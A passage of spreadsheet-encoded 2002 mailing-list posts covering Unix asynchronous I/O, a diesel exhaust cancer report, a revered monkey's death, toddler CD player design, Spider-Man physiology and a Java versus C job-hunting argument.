areas of synergy and collaboration we can explore."Although security is a dominant feature for PayPal, the company's 
ability to carry out open communications among the millions of 
participants fits the growing Web services model, Levchin says."This is a service that links people and allows them to send messages to 
one another," he says. Levchin is a panelist at InfoWorld's 
Next-Generation Web Services II conference Sept. 20PayPal, as an online payment system, is a natural target for fraud. And 
Levchin has almost singlehandedly saved the company from thieves bent on 
exploiting the system, says Avivah Litan, a vice president and analyst 
covering financial services at Stamford, Conn.-based Gartner."If they didn't have Max, they might have succumbed, because PayPal was 
susceptible to fraud and money laundering, and Max tightened them up," 
Litan says.To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</si>
  <si>
    <t>Of course we've had select() since BSD 4.2 and poll() since System V
or so, and they work reasonably well for asynchronous I/O up to a
hundred or so channels, but suck after that; /dev/poll (available in
Solaris and Linux) is one approach to solving this; Linux has a way to
do essentially the same thing with real-time signals, and has for
years; and FreeBSD has kqueue.More details about these are at
http://www.citi.umich.edu/projects/linux-scalability/None of this helps with disk I/O; most programs that need to overlap
disk I/O with computation, on either proprietary Unixes or Linux, just
use multiple threads or processes to handle the disk I/O.POSIX specifies a mechanism for nonblocking disk I/O that most
proprietary Unixes implement.  The Linux kernel hackers are currently
rewriting Linux's entire I/O subsystem essentially from scratch to
work asynchronously, because they can easily build efficient
synchronous I/O primitives from asynchronous ones, but not the other
way around. So now Linux will support this mechanism too.It probably doesn't need saying for anyone who's read Beberg saying
things like "Memory management is a non-issue for anyone that has any
idea at all how the hardware functions," but he's totally off-base.
People should know by now not to take anything he says seriously, but
apparently some don't, so I'll rebut.Not surprisingly, the rebuttal requires many more words than the
original stupid errors.In detail, he wrote:
&gt; Could it be? After 20 years without this feature UNIX finally
&gt; catches up to Windows and has I/O that doesnt [sic] totally suck for
&gt; nontrivial apps? No way!Unix acquired nonblocking I/O in the form of select() about 23 years
ago, and Solaris has had the particular aio_* calls we are discussing
for many years.  Very few applications need the aio_* calls ---
essentially only high-performance RDBMS servers even benefit from them
at all, and most of those have been faking it fine for a while with
multiple threads or processes.  This just provides a modicum of extra
performance.&gt; OK, so they do it with signals or a flag, which is completely
&gt; ghetto, but at least they are trying. Keep trying guys, you got the
&gt; idea, but not the clue.Readers can judge who lacks the clue here.&gt; The Windows I/O model does definately [sic] blow the doors off the
&gt; UNIX one, but then they had select to point at in it's [sic]
&gt; suckiness and anything would have been an improvement. UNIX is just
&gt; now looking at it's [sic] I/O model and adapting to a multiprocess
&gt; multithreaded world so it's gonna be years yet before a posix API
&gt; comes out of it.Although I don't have a copy of the spec handy, I think the aio_* APIs
come from the POSIX spec IEEE Std 1003.1-1990, section 6.7.9, which is
13 years old, and which I think documented then-current practice.
They might be even older than that.Unix has been multiprocess since 1969, and most Unix implementations
have supported multithreading for a decade or more.&gt; Bottom line is the "do stuff when something happens" model turned
&gt; out to be right, and the UNIX "look for something to do and keep
&gt; looking till you find it no matter how many times you have to look"
&gt; is not really working so great anymore.Linux's aio_* routines can notify the process of their completion with
a "signal", a feature missing in Microsoft Windows; a "signal" causes
the immediate execution of a "signal handler" in a process.  By
contrast, the Microsoft Windows mechanisms to do similar things (such
as completion ports) do not deliver a notification until the process
polls them.I don't think signals are a better way to do things in this case
(although I haven't written any RDBMSes myself), but you got the
technical descriptions of the two operating systems exactly backwards.
Most programs that use Linux real-time signals for asynchronous
network I/O, in fact, block the signal in question and poll the signal
queue in a very Windowsish way, using sigtimedwait() or sigwaitinfo().-- 
       Kragen Sitaker     
Edsger Wybe Dijkstra died in August of 2002.  This is a terrible loss after 
which the world will never be the same.
http://www.xent.com/pipermail/fork/2002-August/013974.html</t>
  </si>
  <si>
    <t xml:space="preserve">Ah, THIS is the car i've seen on discovery channel, but url via a lurker.http://arivettracing.com/battery.html- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t>Adam L. Beberg wrote:
&gt; On Tue, 3 Sep 2002, Kragen Sitaker wrote:
&gt; [entire post included]Yep, he sure did. But thanks for reminding us.</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 3 Sep 2002, Kragen Sitaker wrote:&gt;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even older than that.
&gt;
&gt; Unix has been multiprocess since 1969, and most Unix implementations
&gt; have supported multithreading for a decade or more.
&gt;
&gt; &gt; Bottom line is the "do stuff when something happens" model turned
&gt; &gt; out to be right, and the UNIX "look for something to do and keep
&gt; &gt; looking till you find it no matter how many times you have to look"
&gt; &gt; is not really working so great anymore.
&gt;
&gt; Linux's aio_* routines can notify the process of their completion with
&gt; a "signal", a feature missing in Microsoft Windows; a "signal" causes
&gt; the immediate execution of a "signal handler" in a process.  By
&gt; contrast, the Microsoft Windows mechanisms to do similar things (such
&gt; as completion ports) do not deliver a notification until the process
&gt; polls them.
&gt;
&gt; I don't think signals are a better way to do things in this case
&gt; (although I haven't written any RDBMSes myself), but you got the
&gt; technical descriptions of the two operating systems exactly backwards.
&gt; Most programs that use Linux real-time signals for asynchronous
&gt; network I/O, in fact, block the signal in question and poll the signal
&gt; queue in a very Windowsish way, using sigtimedwait() or sigwaitinfo().
&gt;
&gt; --
&gt;        Kragen Sitaker     
&gt; Edsger Wybe Dijkstra died in August of 2002.  This is a terrible loss after
&gt; which the world will never be the same.
&gt; http://www.xent.com/pipermail/fork/2002-August/013974.html
&gt;- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
From: A guy who models plasma all day...
To: "R. A. Hettinga" 
Subject: Re: Electric car an Edsel...
Date: Tue, 3 Sep 2002 22:49:20 -0600Bob,This capacitor drive idea isn't completely stupid, but neither is it well
thought out.Maxwell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etc.But if they can, they can only do it in a vacuum where there is no drag!On to the Lunarnationals?  Or would you prefer the bite of donut?
----- Original Message -----
From: "R. A. Hettinga" 
To: "Vinnie Moscaritolo" ; "Randolph Elliott"
; ; "Duncan Goldie-Scot"
; "G. Gruff" ;Sent: Monday, September 02, 2002 11:15 PM
Subject: Re: Electric car an Edsel...
&gt;
&gt; --- begin forwarded text
&gt;
&gt;
&gt; Status: RO
&gt; Delivered-To: fork@spamassassin.taint.org
&gt; From: "Adam L. Beberg" 
&gt; To: RossO 
&gt; Cc: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&gt; The Internet Bearer Underwriting Corporation 
&gt; 44 Farquhar Street, Boston, MA 02131 USA
&gt; "... however it may deserve respect for its usefulness and antiquity,
&gt; [predicting the end of the world] has not been found agreeable to
&gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
&gt;---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</si>
  <si>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At 4:12 PM +0000 on 9/3/02, Russell Turpin wrote:
&gt; Of the 56 signers of the Declaration of Independence,
&gt; only two were in their twenties at the time. Their
&gt; average age was forty-five. There were no teenagers.
&gt; Fourteen were over fifty. Ben Franklin was the oldest,
&gt; at seventy. For the most part, these were angry,
&gt; middle-aged men.I think it was George Carlin who said something to the effect that young
men in general are boring, but, around fifty, men either have everything
they ever wanted, or have almost nothing of what they wanted; either of
which makes them behave quite interestingly.Cheers,
RAH
-- 
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"Never underestimate the power of stupid people in large groups."
--George Carlin</t>
  </si>
  <si>
    <t>Glad they finally figured this one out... Note the very careful wording, so
exhaust may be beneficial to ones health as long as you have a glass a day
with some cheese.Interesting timing, since 16,000 truckers just lost their jobs and dont have
to worry about death from this anymore.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com--------EPA: Diesel Exhaust Can Cause Cancer
Wed Sep 4, 3:29 AM ET
By H. JOSEF HEBERT, Associated Press WriterWASHINGTON (AP) - Inhaling diesel exhausts from large trucks and other
sources over time can cause cancer in humans, an Environmental Protection
Agency ( news - web sites) report concludes after a decade of study.The EPA finding, released Tuesday, is expected to buttress the government's
push to reduce truck tailpipe emissions by requiring cleaner-burning engines
and diesel fuel with ultra-low sulfur content.While acknowledging uncertainties about the long-term health effects of
exposure to diesel exhausts, the EPA report said studies involving both
animal tests and occupational exposure suggest strong evidence of a cancer
risk to humans."It is reasonable to presume that the hazard extends to environmental
exposure levels" as well, the report said. "The potential human health
effects of diesel exhausts is persuasive, even though assumptions and
uncertainties are involved."The report mirrors conclusions made previously in documents from various
world health agencies and studies in California and is particularly
significant because the EPA is the federal agency that regulates diesel
emissions under the Clean Air Act.Some environmentalists have raised concerns recently that the Bush
administration might try to back away from a Clinton-era regulation that
would establish tougher requirements on emissions from large trucks and a
separate rule that virtually would eliminate sulfur from diesel fuel.EPA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cleaner-burning truck engines.The engine rule does not affect emissions from trucks already on the road,
although the separate regulation cutting the amount of sulfur in diesel fuel
is expected to produce pollution reductions.The EPA's 651-page diesel health assessment did not attempt to estimate the
probability of an individual getting cancer, given certain exposure to
diesel exhaust. Such a risk assessment is commonly made by the EPA when
gauging pollution health concerns.But in this case, the report said, "the exposure-response data are
considered too uncertain" to produce a confident quantitative estimate of
cancer risk to an individual.Nevertheless, said the report, the "totality of evidence from human, animal
and other supporting studies" suggests that diesel exhaust "is likely to be
carcinogenic to humans by inhalation, and that this hazard applies to
environmental exposure."The report reiterated that environmental exposure to diesel exhausts poses
short-term health problems and in the long term has been shown to be a
"chronic respiratory hazard to humans" contributing to increased asthma and
other respiratory problems. In some urban areas diesel exhausts account for
as much as a quarter of the airborne microscopic soot, the report said.Environmentalists welcomed the study as clear evidence that pollution needs
to be curtailed not only from large trucks but also from off-road
diesel-powered vehicles. EPA spokeswoman Steffanie Bell said the agency
expects to publish a rule early next year dealing with those diesel exhaust
sources, which include farm tractors and construction equipment.Emily Figdor of the U.S. Public Interest Research Group, a private
environmental organization, said: "To reduce the public's exposure to
harmful diesel emissions, the Bush administration should ... fully implement
clean air standards for diesel trucks and buses and should pass equivalent
standards for diesel construction and farm equipment."Allen Schaeffer, executive director of the industry group Diesel Technology
Forum, said the EPA's report "focused on the past," whereas "the future is
clean diesel. Diesel trucks and buses built today are more than eight times
cleaner than just a dozen years ago."The report acknowledged that its findings were based on emissions levels in
the mid-1990s, but said the results continued to be valid because the slow
turnover of truck engines has kept many of these vehicles on the road.</t>
  </si>
  <si>
    <t xml:space="preserve">Hindus mourn 'monkey god'
By Omer Farooq
BBC reporter in HyderabadHundreds of people have attended the funeral of a monkey which became
revered as a divine incarnation of a Hindu god in the southern Indian
state of Andhra Pradesh.
The monkey was quite old and both its hind legs were paralysedAnimal rights campaigners say the monkey died of starvation and exhaustion
after being trapped in a temple for a month by over-zealous worshippers.The animal was cremated in Anantapur district, 400 kilometres (250 miles)
south of the state capital, Hyderabad, on Sunday.It had not eaten for three weeks.Last rites were performed by priests in the village of Timmiganipally in
the presence of hundreds of devotees who had come to believe that the
monkey was a reincarnation of the Hindu monkey god, Hanuman.GarlandedOne animal rights activist said his group's efforts to save the monkey had
failed because of the blind faith of the people.
The monkey's death came a day after he and others tried to move the animal
out of the temple, but were prevented by villagers.The monkey, which was found perched on top of an idol of Hanuman a month
ago, attracted hundreds of devotees every day from surrounding villages,
as well as from the neighbouring state of Karnataka.Devotees showered the monkey with fruit and flowers and worshipped it
around the clock.'Exploited'Locals said they believed that Lord Hanuman was visiting the village, as
the temple had stopped daily rituals after a dispute between two groups of
residents.But animal rights campaigners complained that the animal was being
mistreated.They filed a petition in the state's High Court saying the monkey had been
forcibly confined in the temple.The group also alleged that people's religious feelings were being
exploited to make money.The court then ordered the local administration to rescue the monkey - but
villagers prevented officials from taking him for treatment in time.
</t>
  </si>
  <si>
    <t>Hindus got 3 billion gods..... So, losing one is no
big deal, really....Its just sick that they killed an innocent animal,
which doesn't even know the concept of "God".Sateesh
--- Tom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
  </si>
  <si>
    <t xml:space="preserve">So, like many young children, my daughter Tatum (age 21 months) *really*
likes music. She also likes to have control over her environment, and this
means she wants to be the one putting CDs into the CD player, and getting
the music playing.By watching Tatum, I've discovered that you can learn a lot about UI design
from watching 21-month-olds use technology. There is definitely a market
niche for a toddler-friendly CD/MP3 player.The CD player we have combines play and pause in a single button, but
doesn't provide *instantaneous* feedback that the button was pushed, instead
requiring you to wait until the music starts, 5-10 seconds. This is a UI
disaster. Since Tatum doesn't get feedback right away, she presses the
button again, thereby pausing the CD before it even plays. She'll only ever
get music if she presses the button an odd number of times. This happens a
surprising amount of the time, since she eventually hits the button again
when the music doesn't play.For toddlers, pressing play must cause the music to start immediately,
within half a second, for the toddler to get the causality and not press the
button multiple times. As well, pressing the button multiple times shouldn't
change the semantics, like an elevator button. No matter how many times you
press, the elevator still comes to that floor. The play button needs to be
the same.The back-hinged door mechanism feeding the CD into the player is also a UI
disaster for Tatum. Since the door hinges on the back, Tatum has to angle
CDs to put them in, and take them out. Putting CDs in isn't much of a
problem, but taking them out is. Since Tatum grabs CDs by the back edge,
that edge comes out first, hitting the lid. Tatum eventually forces and
wiggles the CD out, a process that's hard on the CD and the player (but
which hasn't yet resulted in the CD player being broken). Surprisingly, it
hasn't been a problem getting the CD hole onto the spindle -- Tatum seems to
understand this concept, and the CD load area geometry naturally guides the
CD.Tatum's CD player also plays tapes and has FM radio. For a toddler, this is
a mistake. Tatum doesn't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music/no music.What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 be a bright color that is different from the color of
the player, and different from the color of the other CD control keys. The
device would only play CDs, no other functions. The CD load area would flip
open at least 80 degrees. It should be small, approachable for a toddler. It
should be possible to repeatedly drop the player from a height of 1-2'
without affecting the player.- Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">
Our preschoolers (2 and 4) use Winamp with a Pokemon skin.  It's the
2-yr-old who figured out he could put it into a sidebar menu so all
he need do is click there to launch their favourite MP3 playlist.What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 http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
This just blew my mind:
http://www.earthviewer.com/The detail of my neighborhood -- even my building -- is unbelievable.
</t>
  </si>
  <si>
    <t xml:space="preserve">Shouldn't a politician know not to tell the truth? Odds he's impeached by
next Monday? [ob: no-clue-how-they-remove-mayors-in-italy]Ouch. Ouch. Ouch.------------Get Sexier, Keep Husbands, Mayor Tells Wives
Wed Sep 4, 9:14 AM ETMISSAGLIA, Italy (Reuters) - Husband's eyes wandering? Make yourself sexier.
At least that's the solution proposed by an Italian mayor -- and a woman
mayor at that.Wives in the northern town of Missaglia had complained to mayor Marta
Casiraghi about a young woman who sunbathed topless on her terrace.They complained that the men in the town of some 7,000 people were spending
too much time ogling, so they asked Casiraghi to order the woman to put her
clothes back on.But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newspaper."Instead, I'd advise the wives to play their rival at her own game -- make
themselves more beautiful."
</t>
  </si>
  <si>
    <t xml:space="preserve">Jim Whitehead wrote:&gt;Great, this is half of what I'd need to become Spider Man! Now all I need to
&gt;figure out is how to do that spider web shooting thing.
&gt;Heheheh... So becomming a university professor was your second career 
choice?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well.As for the spidey senses, well they're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evil-doers while they 
were in their street clothes. Perhaps the spidey senses are the result 
of some sort of quantum entanglement?
Elias
</t>
  </si>
  <si>
    <t xml:space="preserve">
Misc rants about finding jobs, java vs C, what makes a good programmer, etc.
Okay, hmm, I thought twice about this, but what the hey, jobs are hard to
come by. There's a company hiring in Mountain View, looking for a few good
hackers, no Java, no GUI, not even C++ -- just C and Linux and networking
and good old stuff like that. They just raised a wad of money and they're
looking for a few "really good programmers", says the CTO. I know him --
very smart guy. Drives too fast, though, for what that's worth.Joe Bob says "check it out". I'd be happy to pass on your resume, or you can
send it straight to them. Probably won't matter if I pass it on, since I
don't know you guys anyway...http://www.netli.com-- Sherry.&gt; -----Original Message-----
&gt; From: Joseph S. Barrera III [mailto:joe@barrera.org]
&gt; Sent: Tuesday, August 27, 2002 8:58 AM
&gt; To: Adam L. Beberg
&gt; Cc: fork@spamassassin.taint.org
&gt; Subject: Re: Java is for kiddies
&gt; 
&gt; 
&gt; Adam L. Beberg wrote:
&gt;  &gt;&gt;&gt; Forwarding me stuff from a list is hardly handing me a job.
&gt;  &gt;&gt;
&gt;  &gt;&gt; I was talking about the open reqs at Kana (the company I 
&gt; work for).
&gt;  &gt;&gt;  Oh, but programming in Java is beneath you.
&gt;  &gt;
&gt;  &gt; Nope just lacking years and years of it. For some silly 
&gt; reason people
&gt;  &gt; always want things to be reliable, fast, and 
&gt; cross-platform so all my
&gt;  &gt; employers have forced me to code in C :)
&gt; 
&gt; C is more reliable than Java??
&gt; 
&gt; As for cross-platform, C exists on more platforms, but a Java program
&gt; is much easier to move from one platform to another. So I'm not sure
&gt; what you mean.
&gt; 
&gt; I'm not trying to fight a language war, but I'm puzzled by the depth
&gt; of your anti-Java hatred.
&gt; 
&gt;  &gt; I know lots of high school
&gt;  &gt; kiddies with plenty of Java tho, not having to teach people about
&gt;  &gt; pointers or optimization or anything shaves years off the 
&gt; coder boot
&gt;  &gt; time. I'll send them your way when they graduate.
&gt; 
&gt; Pointers. So a language has to have pointers to be real? And 
&gt; references
&gt; don't count, I gather. What's so great about pointers? Why do you
&gt; miss them? If your doing embedded stuff, fine, yes, you need the
&gt; performance and control over memory that C provides. Probably.
&gt; But if your implementing tier N-1 of a tier N system, and pounding
&gt; against a database, then Java is OFTEN a very reasonable choice.
&gt; Especially if you want that system to run without leaking memory.
&gt; 
&gt; Optimization. Who says you can't optimize Java? I can and have,
&gt; and there are good tools that allow you to do it (I use OptimizeIt).
&gt; But usually I find myself optimizing (reducing) database accesses
&gt; instead. I sped one part of the system up by a factor of ten by
&gt; grouping more operations into fewer transactions.
&gt; 
&gt; But this is beside the point. If you have decent C++ experience, and
&gt; have poked around in Java, you should be able to convince most
&gt; employers that you can be trusted writing Java. That's what I did --
&gt; I mean, I joined Kana from Microsoft, and I didn't exactly write
&gt; a lot of Java code at Microsoft.
&gt; 
&gt;  &gt; I'm not displeased you're trying to help, just frustrated that
&gt;  &gt; employers can demand such rediculous combinations of skills with
&gt;  &gt; insane years of experience.
&gt; 
&gt; I don't think I've ever interviewed at a place where I actually
&gt; met all the prerequisites. Do you just give up when you don't?
&gt; 
&gt;  &gt; Interview tommorow with Kodak, doing I have no idea what as the
&gt;  &gt; recruiter isnt even sure, but cross your fingers it wont require 10
&gt;  &gt; years of Java and 5 years of Windows/IA-64's device driver 
&gt; experience
&gt;  &gt; (both common requirements).
&gt; 
&gt; I wish you best of luck, and I apologies for being a bitch.
&gt; But God DAMN, you piss me off sometimes. My son occasionally
&gt; displays your "can't-do" attitude and I do my damnest to
&gt; get him to reverse course.
&gt; 
&gt; - Joe
&gt; 
&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">Someone needs to tell the mayor about this:
http://www.cb-2000.com/
kinkily yours,
CindyOn Wed, 4 Sep 2002, Adam L. Beberg wrote:&gt; Shouldn't a politician know not to tell the truth? Odds he's impeached by
&gt; next Monday? [ob: no-clue-how-they-remove-mayors-in-italy]
&gt; 
&gt; Ouch. Ouch. Ouch.
&gt; 
&gt; ------------
&gt; 
&gt; Get Sexier, Keep Husbands, Mayor Tells Wives
&gt; Wed Sep 4, 9:14 AM ET
&gt; 
&gt; MISSAGLIA, Italy (Reuters) - Husband's eyes wandering? Make yourself sexier.
&gt; At least that's the solution proposed by an Italian mayor -- and a woman
&gt; mayor at that.
&gt; 
&gt; Wives in the northern town of Missaglia had complained to mayor Marta
&gt; Casiraghi about a young woman who sunbathed topless on her terrace.
&gt; 
&gt; They complained that the men in the town of some 7,000 people were spending
&gt; too much time ogling, so they asked Casiraghi to order the woman to put her
&gt; clothes back on.
&gt; 
&gt; But the mayor, far from sympathizing, told the wives to get sexy if they
&gt; wanted to keep their men. "The girl was very pretty and was soaking up some
&gt; sun. Topless sunbathing is largely tolerated and widespread nowadays.
&gt; There's nothing we can do," Casiraghi told Il Nuovo, a web-based newspaper.
&gt; 
&gt; "Instead, I'd advise the wives to play their rival at her own game -- make
&gt; themselves more beautiful."
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">
SL&gt; 
SL&gt; Misc rants about finding jobs, java vs C, what makes a good programmer, etc.
SL&gt; SL&gt; Okay, hmm, I thought twice about this, but what the hey, jobs are hard to
SL&gt; come by. There's a company hiring in Mountain View, looking for a few good
I give Adam an hour or so to come up with an adequate number of
excuses as to why -this- job isn't worth it.  :)GO Adam GO!
</t>
  </si>
  <si>
    <t xml:space="preserve">
A groys gesheft zol er hobn mit shroyre vus er hot, zol men bay im nit
fregn, un vos men fregt zol er nisht hobn, and if that aint the truth
nutin is.
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: "Jim Whitehead" &gt;
&gt; For toddlers, pressing play must cause the music to start immediately,
&gt; within half a second, for the toddler to get the causality and not press
the
&gt; button multiple times.
Or some sound indicating that the music will start real soon now.&gt;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
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Elias Sinderson  writes:    E&gt; ... The strength to weight ratio of a spider is so high
    E&gt; that Spiderman is able to throw a bus several city blocks with
    E&gt; little effort. His endurance is similarly enhanced as well.Could this be as simple as a modified molecular structure where the
humanoid cells are in fact exo-skeletally structured with more atoms
per cubic angstrom to achieve the distance-squared tensile strength
enhancements we find when we introduce smaller metal atoms between the
lattice packed grid of iron atoms to create steel?  This 'steel-effect' might give bone structure and tendons dramatically
(several orders of magnitude) more tensile strength without the need
to significantly increase the weight (like magnesium-alloy or
carbon-fiber weight compared to iron, Spidey could even be way under
weight).  Only increasing tensile strength could accommodate the
mobility and leverage feats since bones are actually formed from
bubbles of organic material hydrolically assisted, tensile strength
cross-sectionally would give his frame the strength to withstand the
muscular enhancement.    E&gt; As for the spidey senses, well they're really great, but AFAIK
    E&gt; not really well explained in the comic series. If the same close-packing gap-filling arachne-molecular structure
modification occurs in neural tissues, and there'd be no reason to
think that these would grow differently from bones and tendons, then
what we are seeing in spidey sense is no more than the heightened
cerebral functions due to shorter/faster/stronger synapses throughout
the entire nervous system.  Since we know dogs and cats measure human emotions by smell, clearly
hearing the heartbeats, and other subtle clues within their normal
sensory ranges (but seem mystical to us) ...  for Peter Parker,
everything from air currents on his facial-hairs to extremely subtle
hormone smells might coallesce into a general gestalt of Spidey-Sense;
don't forget that he'd acquired this ability in adolescence and thus
would lack any cultural or even pathological basis to explain the
heightened awareness to himself in anything but mystical terms. We
know from issue #1 that his collision-avoidance reflex response time
was far swifter than his cognitive awareness since he 'found' himself
already stuck to the tree when the bicycle was already past and hence
his disorientation ("You ok, Mister?") as if it was a hallucination.Hmmm ... it may even be physio-psychologically interesting to examine
if Peter Parker's personal quandries arose _because_ his physiological
'Spidey' infrastructure had been advanced whereas his psychological
perception of his self had not, ie, "Peter" was not "Spiderman" but
just the "driver of the bus".  Only, unlike ourselves, he found his
self driving a body-vehicle not evolutionarily matched to his
cognitive time-scales.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t>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now.A tonal countdown would be nice.&gt; &gt; What would the ideal toddler CD player be like? It would immediately start
&gt; &gt; playing a CD after it was loaded.
&gt; It'd be an MP3 player with solid state storage... instant on.Hmm.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operation.You could also take the CD out while it is "playing".Hmm.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Gordon</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 4 Sep 2002, Gordon Mohr wrote:--]Hmm. Seems like every CD player should include the
--]capability to rip, encode, and cache the last few CDs
--]inserted.There are companies doing just that, but given the current state of the
DRm sceen and the litigiouness of the RIAA, who wants to go down like
circus seals?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 4 Sep 2002, Mr. FoRK wrote:
--]It'd be an MP3 player with solid state storage... instant on.
Getting new media on is a bit out of the reach of the kindala. With a CD
solution you hand em a disc and in it goes.Tradeoffs abound.Heather got a CD player when she was 5. Even though it was a crappy
handmedown it worked great other than the batterys poping out..bad bad ui
there. Her next one was a store bought.  Its an all Audio player, no mp3
decoders for her yet. I wanted to do the bottom line Volt but momala put
the kabash on anything costing over 30 bucks. heck I had to scrounge ebay
to get her a palm m100 for about 25 bucks.The only hitch is new music. Upshot is we spend time going over usenet
listing togther:)-Its a happy family.Now for Benjamin, yea id love to have something like the amazingly cool
Fisher Price My First (cd, casset, vasectomy, dirtybomb) products. Perhaps
the My First Cd might work...time to let ebay do the walking.
</t>
  </si>
  <si>
    <t>"Jim Whitehead"  writes:&gt;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play.Nice to hear that somebody else does this too.-- 
Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 4 Sep 2002, Tom wrote:
&gt; A groys gesheft zol er hobn mit shroyre vus er hot, zol men bay im nit
&gt; fregn, un vos men fregt zol er nisht hobn, and if that aint the truth
&gt; nutin is.A nice curse. Don't get "shroyre", though.
</t>
  </si>
  <si>
    <t>bitbitch@magnesium.net writes:&gt; SL&gt; 
&gt; SL&gt; Misc rants about finding jobs, java vs C, what makes a good programmer, etc.
&gt; SL&gt; 
&gt; 
&gt; SL&gt; Okay, hmm, I thought twice about this, but what the hey, jobs are hard to
&gt; SL&gt; come by. There's a company hiring in Mountain View, looking for a few good
&gt; 
&gt; 
&gt; I give Adam an hour or so to come up with an adequate number of
&gt; excuses as to why -this- job isn't worth it.  :)http://www.netli.com/careers/index.htm&gt;* Along with your resume, please answer this question: What does this ï¿½Cï¿½ statement do? #define XY(s, m) (&amp;((s *)0)-&gt;m)Besides provide job security?-- 
Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/</t>
  </si>
  <si>
    <t>&gt; Now for Benjamin, yea id love to have something like the amazingly cool
&gt; Fisher Price My First (cd, casset, vasectomy, dirtybomb) products. Perhaps
&gt; the My First Cd might work...time to let ebay do the walking.Sony makes such a line of products.My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it's looks but used it nonetheless.  I also gave him a pack of
headphones as there's no such things indestuctible headphones that aren't
obscenely bulky.Now that we're riding up the curve of an ever increasing geezer population, how
soon before device makers get wise?  Not to be morbid, but would the marketing
be "My Last Sony"?  -Bill Kearney</t>
  </si>
  <si>
    <t>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too.Law and society are wholeheartedly trivial.  Big fuzzy concepts like
"sluts vs. moms" are convenient vehicles for petty disputes as often as
not.- Lucas</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Karl
&gt; Anderson
&gt; Sent: Thursday, September 05, 2002 3:50 AM
&gt; To: bitbitch@magnesium.net
&gt; Cc: 'fork@spamassassin.taint.org'
&gt; Subject: Re: Re[2]: Java is for kiddies
&gt;
&gt;
&gt; bitbitch@magnesium.net writes:
&gt;
&gt; &gt; SL&gt; 
&gt; &gt; SL&gt; Misc rants about finding jobs, java vs C, what makes a good
&gt; programmer, etc.
&gt; &gt; SL&gt; 
&gt; &gt; 
&gt; &gt; SL&gt; Okay, hmm, I thought twice about this, but what the hey,
&gt; jobs are hard to
&gt; &gt; SL&gt; come by. There's a company hiring in Mountain View, looking
&gt; for a few good
&gt; &gt; 
&gt; &gt;
&gt; &gt; I give Adam an hour or so to come up with an adequate number of
&gt; &gt; excuses as to why -this- job isn't worth it.  :)
&gt;
&gt; http://www.netli.com/careers/index.htm
&gt;
&gt; &gt;* Along with your resume, please answer this question: What does
&gt; this _x0013_C_x0014_ statement do? #define XY(s, m) (&amp;((s *)0)-&gt;m)
&gt;
&gt; Besides provide job security?This is more useful...#define CONTAINING_RECORD(address, type, field) ((type *)( \
                                                  (PCHAR)(address) - \
                                                  (PCHAR)(&amp;((type
*)0)-&gt;field)))Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">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
&gt; situations are great, provided everyone is aware that the relationship
&gt; is a contractual one -- he wants a maid, a dog and a prostitute he
&gt; doesn't have to pay, and she wants a country that isn't impoverished
&gt; and teeming with AIDS.  A contract, versus a true love-interest
&gt; marriage.
&gt; 
&gt; Egh.  I really need to stop analyzing your posts to this extent.   I
&gt; blame law school and my cat.
&gt; 
&gt; -BB
&gt; 
&gt; ALB&gt; - Adam L. "Duncan" Beberg
&gt; ALB&gt;   http://www.mithral.com/~beberg/
&gt; ALB&gt;   beberg@mithral.com
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">It's a fair trade, IMO.  Same for some mid-east bloke who's dying to marry 
American so he can start his own business.  But BB is right.  When the 
thrill is gone, she should take his shit.  LOL
CindyDrinkingOn Thu, 5 Sep 2002, Adam L. Beberg wrote:&gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
&gt; 
&gt; &gt; Again, these situations are great, provided everyone is aware that the
&gt; &gt; relationship is a contractual one -- he wants a maid, a dog and a
&gt; &gt; prostitute he doesn't have to pay, and she wants a country that isn't
&gt; &gt; impoverished and teeming with AIDS.
&gt; 
&gt; You assume that they just match people up and marry them off, and neither is
&gt; attracted to the other, which is not the case. Even this has arranged
&gt; marrage beat by a long way.
&gt; 
&gt; Males gets: A wife for a while, and if they actually like each other, for a
&gt; long time.
&gt; Female gets: Into Britan, out of a country with no real rights for women, no
&gt; opportunities for her or her children, out of the polution, AIDS, and an
&gt; uncountable number of scary tropical diseases. Not to mention in most cases
&gt; living conditions that us spoiled Americans cannot even comprehend.
&gt; 
&gt; Yea, the women is definately getting tha bad end of the deal here.
&gt; 
&gt; You're so easy to taunt :)
&gt; 
&gt; - Adam L. "Duncan" Beberg
&gt;   http://www.mithral.com/~beberg/
&gt;   beberg@mithral.com
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Someone has taken it.  Mostly newtel users.  I think we can take the.
C-- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t>Adam Beberg writes:
